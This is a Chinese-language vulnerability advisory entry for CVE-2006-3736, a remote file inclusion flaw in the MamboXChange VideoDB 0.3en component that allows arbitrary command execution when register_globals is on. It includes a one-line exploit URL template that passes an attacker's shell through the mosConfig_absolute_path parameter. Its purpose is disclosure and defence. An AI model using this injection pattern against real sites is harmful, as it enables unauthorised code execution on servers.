添加时间:
2008-10-03

系统编号:
WAVDB-00998
BugCVE: CVE-2006-3736
BUGTRAQ: 19049

影响版本:
MamboXChange VideoDB 0.3en

程序介绍:

VideoDB是Mambo中的一个组件，用于从网络上下载数据信息，管理视频收藏。

漏洞分析:

VideoDB组件在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上有Web进程权限执行任意命令。
模块的core/videodb.class.xml.php脚本没有正确地验证mosConfig_absolute_path参数的输入，允许攻击者可以通过包含本地或外部资源的任意文件导致执行任意代码。成功攻击要求打开了register_globals。 

漏洞利用:

http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell]

解决方案:
厂商补丁：
MamboXChange
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://mamboxchange.com/projects/videodb/

信息来源:
<*来源：h4ntu *>